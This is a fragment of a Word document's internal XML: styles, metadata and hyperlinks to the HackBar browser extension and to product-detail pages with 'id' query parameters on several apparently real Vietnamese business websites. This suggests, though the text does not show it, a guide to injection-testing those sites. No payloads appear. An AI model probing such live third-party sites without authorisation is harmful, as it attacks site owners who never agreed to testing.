    <w:rsid w:val="008C5B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5B17"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C5B1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5B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0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chromewebstore.google.com/detail/hackbar/ginpbkfigcoaokgflihfhhmglmbchinc" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.diencovothanhdat.com/?php=product_detail&amp;id=30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hyperlink" Target="https://www.thepdaitayduong.com.vn/?php=product_detail&amp;id=22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www.tapiocafeedfood.com/?php=product_detail&amp;id=295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10</Pages>
  <Words>634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phụng</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ngọc phụng</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-29T01:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-29T03:26:00Z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2024-08-29T02:03:36Z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28d66c42-6d45-427a-841c-19b542e99e21</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_defa4170-0d19-0005-0004-bc88714345d2_ActionId">
    <vt:lpwstr>45d05a68-6c4b-4a6a-ace7-dda8139c1af0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_defa4170-0d19-0005-0004-bc88714345d2_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>